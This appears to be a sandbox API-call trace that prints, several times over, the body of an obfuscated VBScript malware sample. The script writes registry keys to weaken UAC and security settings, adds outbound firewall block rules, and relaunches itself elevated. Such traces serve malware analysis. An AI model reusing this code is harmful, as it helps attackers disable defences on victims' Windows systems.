CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 39 [0226.311] wcsncmp (_String1="-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32 [0226.311] wcsncmp (_String1="id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.311] wcsncmp (_String1="d)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0226.311] wcsncmp (_String1=")\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.311] wcsncmp (_String1="\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 